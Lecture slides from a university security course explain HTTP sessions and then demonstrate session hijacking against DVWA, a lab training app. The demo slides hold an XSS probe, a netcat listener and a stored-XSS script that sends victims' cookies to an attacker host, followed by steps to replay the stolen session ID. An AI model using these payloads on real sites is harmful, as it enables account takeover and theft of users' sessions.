Presentation on theme: "NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba."— Presentation transcript:
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba Czech Republic Session Hijacking
navy.cs.vsb.cz 2 HTTP protocol The Hypertext Transfer Protocol (HTTP) is an application-level protocol for distributed, collaborative, hypermedia information systems. HTTP has been in use by the World-Wide Web global information initiative since 1990.
navy.cs.vsb.cz 5 HTTP protocol Server response: HTTP/1.1 200 OK Date: Mon, 27 Jul 2009 12:28:53 GMT Server: Apache Last-Modified: Wed, 22 Jul 2009 19:15:56 GMT ETag: "34aa387-d-1568eb00" Accept-Ranges: bytes Content-Length: 51 Vary: Accept-Encoding Content-Type: text/plain Hello World! My payload includes a trailing CRLF.
navy.cs.vsb.cz 6 Session Is a semi-permanent interactive information interchange, also known as a dialogue, a conversation or a meeting, between two or more communicating devices, or between a computer and user (Login session). A session is set up or established at a certain point in time, and then torn down at some later point. – An established communication session may involve more than one message in each direction. A session is typically, stateful, meaning that at least one of the communicating parts needs to save information about the session history in order to be able to communicate, as opposed to stateless communication, where the communication consists of independent requests with responses.
navy.cs.vsb.cz 7 Session An HTTP session is a sequence of network request- response transactions. – An HTTP client initiates a request by establishing a Transmission Control Protocol (TCP) connection to a particular port on a server (typically port 80). – An HTTP server listening on that port waits for a client's request message. – Upon receiving the request, the server sends back a status line, such as "HTTP/1.1 200 OK", and a message of its own. – The body of this message is typically the requested resource, although an error message or other information may also be returned.
navy.cs.vsb.cz 9 Session HTTP is a stateless protocol. HTTP server require sessions to retain information or status about each user for the duration of multiple requests. Some web applications implement states or server side sessions using for instance HTTP cookies or hidden variables within web forms or encoded parameters in URL
navy.cs.vsb.cz 11 Session hijacking Session hijacking is when a attacker takes over a session between two systems (machines). The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token. – Because http communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. – The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. – A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the http requisition as a cookie, in other parts of the header of the http request, or yet in the body of the http requisition. The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.
navy.cs.vsb.cz 14 Session hijacking– Man in the middle
navy.cs.vsb.cz 15 Session hijacking – XSS (Cross Site Scripting)
navy.cs.vsb.cz 18 Demo 1.Attacker logs into target web application as a common user. http://127.0.0.1/dvwa/login.php User name: smithy Password: password 2.Try XSS vulnerability of text input. Type in: < alert('XSS!'); alert(document.cookie);
navy.cs.vsb.cz 20 Demo Attacker logs in into Kali Linux Username: root Password: toor Determine your attacker’s IP address root@kali:~# ifconfig eth0
navy.cs.vsb.cz 21 Demo Use Netcat utility to listen incoming HTTP requests (TCP port 80) root@kali:~# netcat -lvp 80 -l … listen mode, for inbound connects -v … verbose [use twice to be more verbose] -p port... local port number
navy.cs.vsb.cz 22 Demo In DVWA navigate to XSS Stored (Guest Book) section – This section represents guest book. Records are stored in DB. Add new record with your malicious script which will hijack victim’s session ID – HOST is your attacker’s PC IP address
navy.cs.vsb.cz 23 Demo var img = new Image(); img.src = "http://HOST/MyNetcatServiceListener?cookie="+document. cookie;
navy.cs.vsb.cz 24 Demo Now whoever visits the GuestBook will execute your XSS code and send cookie with SESSIONID to your attacker's PC
navy.cs.vsb.cz 25 Demo Use the hijacked Cookie to bypass the authentication. In your attacker’s PC open browser and navigate to DVWA web page.
navy.cs.vsb.cz 26 Demo Open Tamper Data plugin and start Tamper. Fill in non existing user name and password to get your own session. In Tamper Data plugin edit PHPSESSID value to the value you have received from hijacked Cookie